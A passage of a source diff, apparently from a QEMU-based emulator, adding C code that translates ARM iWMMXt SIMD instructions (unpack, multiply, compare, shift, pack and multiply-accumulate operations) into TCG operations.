12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + gen_op_iwmmxt_unpacklb_M0_wRn(s, rd1); + break; + case 1: + gen_op_iwmmxt_unpacklw_M0_wRn(s, rd1); + break; + case 2: + gen_op_iwmmxt_unpackll_M0_wRn(s, rd1); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x10c: case 0x50c: case 0x90c: case 0xd0c: /* WUNPCKIH */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + gen_op_iwmmxt_unpackhb_M0_wRn(s, rd1); + break; + case 1: + gen_op_iwmmxt_unpackhw_M0_wRn(s, rd1); + break; + case 2: + gen_op_iwmmxt_unpackhl_M0_wRn(s, rd1); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x012: case 0x112: case 0x412: case 0x512: /* WSAD */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + if (insn & (1 << 22)) + gen_op_iwmmxt_sadw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_sadb_M0_wRn(s, rd1); + if (!(insn & (1 << 20))) + gen_op_iwmmxt_addl_M0_wRn(s, wrd); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x010: case 0x110: case 0x210: case 0x310: /* WMUL */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + if (insn & (1 << 21)) { + if (insn & (1 << 20)) + gen_op_iwmmxt_mulshw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_mulslw_M0_wRn(s, rd1); + } else { + if (insn & (1 << 20)) + gen_op_iwmmxt_muluhw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_mululw_M0_wRn(s, rd1); + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x410: case 0x510: case 0x610: case 0x710: /* WMAC */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + if (insn & (1 << 21)) + gen_op_iwmmxt_macsw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_macuw_M0_wRn(s, rd1); + if (!(insn & (1 << 20))) { + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, wrd); + tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x006: case 0x406: case 0x806: case 0xc06: /* WCMPEQ */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + gen_op_iwmmxt_cmpeqb_M0_wRn(s, rd1); + break; + case 1: + gen_op_iwmmxt_cmpeqw_M0_wRn(s, rd1); + break; + case 2: + gen_op_iwmmxt_cmpeql_M0_wRn(s, rd1); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x800: case 0x900: case 0xc00: case 0xd00: /* WAVG2 */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + if (insn & (1 << 22)) { + if (insn & (1 << 20)) + gen_op_iwmmxt_avgw1_M0_wRn(s, rd1); + else + gen_op_iwmmxt_avgw0_M0_wRn(s, rd1); + } else { + if (insn & (1 << 20)) + gen_op_iwmmxt_avgb1_M0_wRn(s, rd1); + else + gen_op_iwmmxt_avgb0_M0_wRn(s, rd1); + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x802: case 0x902: case 0xa02: case 0xb02: /* WALIGNR */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCGR0 + ((insn >> 20) & 3)); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 7); + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rd1); + gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x601: case 0x605: case 0x609: case 0x60d: /* TINSR */ + if (((insn >> 6) & 3) == 3) + return 1; + rd = (insn >> 12) & 0xf; + wrd = (insn >> 16) & 0xf; + tmp = load_reg(s, rd); + gen_op_iwmmxt_movq_M0_wRn(s, wrd); + switch ((insn >> 6) & 3) { + case 0: + tmp2 = tcg_const_i32(tcg_ctx, 0xff); + tmp3 = tcg_const_i32(tcg_ctx, (insn & 7) << 3); + break; + case 1: + tmp2 = tcg_const_i32(tcg_ctx, 0xffff); + tmp3 = tcg_const_i32(tcg_ctx, (insn & 3) << 4); + break; + case 2: + tmp2 = tcg_const_i32(tcg_ctx, 0xffffffff); + tmp3 = tcg_const_i32(tcg_ctx, (insn & 1) << 5); + break; + default: + TCGV_UNUSED_I32(tmp2); + TCGV_UNUSED_I32(tmp3); + } + gen_helper_iwmmxt_insr(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x107: case 0x507: case 0x907: case 0xd07: /* TEXTRM */ + rd = (insn >> 12) & 0xf; + wrd = (insn >> 16) & 0xf; + if (rd == 15 || ((insn >> 22) & 3) == 3) + return 1; + gen_op_iwmmxt_movq_M0_wRn(s, wrd); + tmp = tcg_temp_new_i32(tcg_ctx); + switch ((insn >> 22) & 3) { + case 0: + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 7) << 3); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); + if (insn & 8) { + tcg_gen_ext8s_i32(tcg_ctx, tmp, tmp); + } else { + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xff); + } + break; + case 1: + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 3) << 4); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); + if (insn & 8) { + tcg_gen_ext16s_i32(tcg_ctx, tmp, tmp); + } else { + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff); + } + break; + case 2: + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 1) << 5); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); + break; + } + store_reg(s, rd, tmp); + break; + case 0x117: case 0x517: case 0x917: case 0xd17: /* TEXTRC */ + if ((insn & 0x000ff008) != 0x0003f000 || ((insn >> 22) & 3) == 3) + return 1; + tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCASF); + switch ((insn >> 22) & 3) { + case 0: + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 7) << 2) + 0); + break; + case 1: + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 3) << 3) + 4); + break; + case 2: + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 1) << 4) + 12); + break; + } + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 28); + gen_set_nzcv(s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x401: case 0x405: case 0x409: case 0x40d: /* TBCST */ + if (((insn >> 6) & 3) == 3) + return 1; + rd = (insn >> 12) & 0xf; + wrd = (insn >> 16) & 0xf; + tmp = load_reg(s, rd); + switch ((insn >> 6) & 3) { + case 0: + gen_helper_iwmmxt_bcstb(tcg_ctx, tcg_ctx->cpu_M0, tmp); + break; + case 1: + gen_helper_iwmmxt_bcstw(tcg_ctx, tcg_ctx->cpu_M0, tmp); + break; + case 2: + gen_helper_iwmmxt_bcstl(tcg_ctx, tcg_ctx->cpu_M0, tmp); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x113: case 0x513: case 0x913: case 0xd13: /* TANDC */ + if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3) + return 1; + tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCASF); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); + switch ((insn >> 22) & 3) { + case 0: + for (i = 0; i < 7; i ++) { + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4); + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + } + break; + case 1: + for (i = 0; i < 3; i ++) { + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8); + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + } + break; + case 2: + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + break; + } + gen_set_nzcv(s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x01c: case 0x41c: case 0x81c: case 0xc1c: /* WACC */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + gen_helper_iwmmxt_addcb(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); + break; + case 1: + gen_helper_iwmmxt_addcw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); + break; + case 2: + gen_helper_iwmmxt_addcl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x115: case 0x515: case 0x915: case 0xd15: /* TORC */ + if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3) + return 1; + tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCASF); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); + switch ((insn >> 22) & 3) { + case 0: + for (i = 0; i < 7; i ++) { + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + } + break; + case 1: + for (i = 0; i < 3; i ++) { + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + } + break; + case 2: + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + break; + } + gen_set_nzcv(s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x103: case 0x503: case 0x903: case 0xd03: /* TMOVMSK */ + rd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + if ((insn & 0xf) != 0 || ((insn >> 22) & 3) == 3) + return 1; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_temp_new_i32(tcg_ctx); + switch ((insn >> 22) & 3) { + case 0: + gen_helper_iwmmxt_msbb(tcg_ctx, tmp, tcg_ctx->cpu_M0); + break; + case 1: + gen_helper_iwmmxt_msbw(tcg_ctx, tmp, tcg_ctx->cpu_M0); + break; + case 2: + gen_helper_iwmmxt_msbl(tcg_ctx, tmp, tcg_ctx->cpu_M0); + break; + } + store_reg(s, rd, tmp); + break; + case 0x106: case 0x306: case 0x506: case 0x706: /* WCMPGT */ + case 0x906: case 0xb06: case 0xd06: case 0xf06: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + if (insn & (1 << 21)) + gen_op_iwmmxt_cmpgtsb_M0_wRn(s, rd1); + else + gen_op_iwmmxt_cmpgtub_M0_wRn(s, rd1); + break; + case 1: + if (insn & (1 << 21)) + gen_op_iwmmxt_cmpgtsw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_cmpgtuw_M0_wRn(s, rd1); + break; + case 2: + if (insn & (1 << 21)) + gen_op_iwmmxt_cmpgtsl_M0_wRn(s, rd1); + else + gen_op_iwmmxt_cmpgtul_M0_wRn(s, rd1); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x00e: case 0x20e: case 0x40e: case 0x60e: /* WUNPCKEL */ + case 0x80e: case 0xa0e: case 0xc0e: case 0xe0e: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + if (insn & (1 << 21)) + gen_op_iwmmxt_unpacklsb_M0(s); + else + gen_op_iwmmxt_unpacklub_M0(s); + break; + case 1: + if (insn & (1 << 21)) + gen_op_iwmmxt_unpacklsw_M0(s); + else + gen_op_iwmmxt_unpackluw_M0(s); + break; + case 2: + if (insn & (1 << 21)) + gen_op_iwmmxt_unpacklsl_M0(s); + else + gen_op_iwmmxt_unpacklul_M0(s); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x00c: case 0x20c: case 0x40c: case 0x60c: /* WUNPCKEH */ + case 0x80c: case 0xa0c: case 0xc0c: case 0xe0c: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + if (insn & (1 << 21)) + gen_op_iwmmxt_unpackhsb_M0(s); + else + gen_op_iwmmxt_unpackhub_M0(s); + break; + case 1: + if (insn & (1 << 21)) + gen_op_iwmmxt_unpackhsw_M0(s); + else + gen_op_iwmmxt_unpackhuw_M0(s); + break; + case 2: + if (insn & (1 << 21)) + gen_op_iwmmxt_unpackhsl_M0(s); + else + gen_op_iwmmxt_unpackhul_M0(s); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x204: case 0x604: case 0xa04: case 0xe04: /* WSRL */ + case 0x214: case 0x614: case 0xa14: case 0xe14: + if (((insn >> 22) & 3) == 0) + return 1; + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_temp_new_i32(tcg_ctx); + if (gen_iwmmxt_shift(s, insn, 0xff, tmp)) { + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + switch ((insn >> 22) & 3) { + case 1: + gen_helper_iwmmxt_srlw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 2: + gen_helper_iwmmxt_srll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 3: + gen_helper_iwmmxt_srlq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x004: case 0x404: case 0x804: case 0xc04: /* WSRA */ + case 0x014: case 0x414: case 0x814: case 0xc14: + if (((insn >> 22) & 3) == 0) + return 1; + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_temp_new_i32(tcg_ctx); + if (gen_iwmmxt_shift(s, insn, 0xff, tmp)) { + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + switch ((insn >> 22) & 3) { + case 1: + gen_helper_iwmmxt_sraw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 2: + gen_helper_iwmmxt_sral(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 3: + gen_helper_iwmmxt_sraq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x104: case 0x504: case 0x904: case 0xd04: /* WSLL */ + case 0x114: case 0x514: case 0x914: case 0xd14: + if (((insn >> 22) & 3) == 0) + return 1; + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_temp_new_i32(tcg_ctx); + if (gen_iwmmxt_shift(s, insn, 0xff, tmp)) { + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + switch ((insn >> 22) & 3) { + case 1: + gen_helper_iwmmxt_sllw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 2: + gen_helper_iwmmxt_slll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 3: + gen_helper_iwmmxt_sllq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x304: case 0x704: case 0xb04: case 0xf04: /* WROR */ + case 0x314: case 0x714: case 0xb14: case 0xf14: + if (((insn >> 22) & 3) == 0) + return 1; + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_temp_new_i32(tcg_ctx); + switch ((insn >> 22) & 3) { + case 1: + if (gen_iwmmxt_shift(s, insn, 0xf, tmp)) { + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + gen_helper_iwmmxt_rorw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 2: + if (gen_iwmmxt_shift(s, insn, 0x1f, tmp)) { + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + gen_helper_iwmmxt_rorl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + case 3: + if (gen_iwmmxt_shift(s, insn, 0x3f, tmp)) { + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + gen_helper_iwmmxt_rorq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x116: case 0x316: case 0x516: case 0x716: /* WMIN */ + case 0x916: case 0xb16: case 0xd16: case 0xf16: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + if (insn & (1 << 21)) + gen_op_iwmmxt_minsb_M0_wRn(s, rd1); + else + gen_op_iwmmxt_minub_M0_wRn(s, rd1); + break; + case 1: + if (insn & (1 << 21)) + gen_op_iwmmxt_minsw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_minuw_M0_wRn(s, rd1); + break; + case 2: + if (insn & (1 << 21)) + gen_op_iwmmxt_minsl_M0_wRn(s, rd1); + else + gen_op_iwmmxt_minul_M0_wRn(s, rd1); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x016: case 0x216: case 0x416: case 0x616: /* WMAX */ + case 0x816: case 0xa16: case 0xc16: case 0xe16: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 0: + if (insn & (1 << 21)) + gen_op_iwmmxt_maxsb_M0_wRn(s, rd1); + else + gen_op_iwmmxt_maxub_M0_wRn(s, rd1); + break; + case 1: + if (insn & (1 << 21)) + gen_op_iwmmxt_maxsw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_maxuw_M0_wRn(s, rd1); + break; + case 2: + if (insn & (1 << 21)) + gen_op_iwmmxt_maxsl_M0_wRn(s, rd1); + else + gen_op_iwmmxt_maxul_M0_wRn(s, rd1); + break; + case 3: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x002: case 0x102: case 0x202: case 0x302: /* WALIGNI */ + case 0x402: case 0x502: case 0x602: case 0x702: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_const_i32(tcg_ctx, (insn >> 20) & 3); + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rd1); + gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x01a: case 0x11a: case 0x21a: case 0x31a: /* WSUB */ + case 0x41a: case 0x51a: case 0x61a: case 0x71a: + case 0x81a: case 0x91a: case 0xa1a: case 0xb1a: + case 0xc1a: case 0xd1a: case 0xe1a: case 0xf1a: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 20) & 0xf) { + case 0x0: + gen_op_iwmmxt_subnb_M0_wRn(s, rd1); + break; + case 0x1: + gen_op_iwmmxt_subub_M0_wRn(s, rd1); + break; + case 0x3: + gen_op_iwmmxt_subsb_M0_wRn(s, rd1); + break; + case 0x4: + gen_op_iwmmxt_subnw_M0_wRn(s, rd1); + break; + case 0x5: + gen_op_iwmmxt_subuw_M0_wRn(s, rd1); + break; + case 0x7: + gen_op_iwmmxt_subsw_M0_wRn(s, rd1); + break; + case 0x8: + gen_op_iwmmxt_subnl_M0_wRn(s, rd1); + break; + case 0x9: + gen_op_iwmmxt_subul_M0_wRn(s, rd1); + break; + case 0xb: + gen_op_iwmmxt_subsl_M0_wRn(s, rd1); + break; + default: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x01e: case 0x11e: case 0x21e: case 0x31e: /* WSHUFH */ + case 0x41e: case 0x51e: case 0x61e: case 0x71e: + case 0x81e: case 0x91e: case 0xa1e: case 0xb1e: + case 0xc1e: case 0xd1e: case 0xe1e: case 0xf1e: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tmp = tcg_const_i32(tcg_ctx, ((insn >> 16) & 0xf0) | (insn & 0x0f)); + gen_helper_iwmmxt_shufh(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x018: case 0x118: case 0x218: case 0x318: /* WADD */ + case 0x418: case 0x518: case 0x618: case 0x718: + case 0x818: case 0x918: case 0xa18: case 0xb18: + case 0xc18: case 0xd18: case 0xe18: case 0xf18: + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 20) & 0xf) { + case 0x0: + gen_op_iwmmxt_addnb_M0_wRn(s, rd1); + break; + case 0x1: + gen_op_iwmmxt_addub_M0_wRn(s, rd1); + break; + case 0x3: + gen_op_iwmmxt_addsb_M0_wRn(s, rd1); + break; + case 0x4: + gen_op_iwmmxt_addnw_M0_wRn(s, rd1); + break; + case 0x5: + gen_op_iwmmxt_adduw_M0_wRn(s, rd1); + break; + case 0x7: + gen_op_iwmmxt_addsw_M0_wRn(s, rd1); + break; + case 0x8: + gen_op_iwmmxt_addnl_M0_wRn(s, rd1); + break; + case 0x9: + gen_op_iwmmxt_addul_M0_wRn(s, rd1); + break; + case 0xb: + gen_op_iwmmxt_addsl_M0_wRn(s, rd1); + break; + default: + return 1; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x008: case 0x108: case 0x208: case 0x308: /* WPACK */ + case 0x408: case 0x508: case 0x608: case 0x708: + case 0x808: case 0x908: case 0xa08: case 0xb08: + case 0xc08: case 0xd08: case 0xe08: case 0xf08: + if (!(insn & (1 << 20)) || ((insn >> 22) & 3) == 0) + return 1; + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 16) & 0xf; + rd1 = (insn >> 0) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + switch ((insn >> 22) & 3) { + case 1: + if (insn & (1 << 21)) + gen_op_iwmmxt_packsw_M0_wRn(s, rd1); + else + gen_op_iwmmxt_packuw_M0_wRn(s, rd1); + break; + case 2: + if (insn & (1 << 21)) + gen_op_iwmmxt_packsl_M0_wRn(s, rd1); + else + gen_op_iwmmxt_packul_M0_wRn(s, rd1); + break; + case 3: + if (insn & (1 << 21)) + gen_op_iwmmxt_packsq_M0_wRn(s, rd1); + else + gen_op_iwmmxt_packuq_M0_wRn(s, rd1); + break; + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x201: case 0x203: case 0x205: case 0x207: + case 0x209: case 0x20b: case 0x20d: case 0x20f: + case 0x211: case 0x213: case 0x215: case 0x217: + case 0x219: case 0x21b: case 0x21d: case 0x21f: + wrd = (insn >> 5) & 0xf; + rd0 = (insn >> 12) & 0xf; + rd1 = (insn >> 0) & 0xf; + if (rd0 == 0xf || rd1 == 0xf) + return 1; + gen_op_iwmmxt_movq_M0_wRn(s, wrd); + tmp = load_reg(s, rd0); + tmp2 = load_reg(s, rd1); + switch ((insn >> 16) & 0xf) { + case 0x0: /* TMIA */ + gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); + break; + case 0x8: /* TMIAPH */ + gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); + break; + case 0xc: case 0xd: case 0xe: case 0xf: /* TMIAxy */ + if (insn & (1 << 16)) + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); + if (insn & (1 << 17)) + tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); + gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); + break; + default: + tcg_temp_free_i32(tcg_ctx, 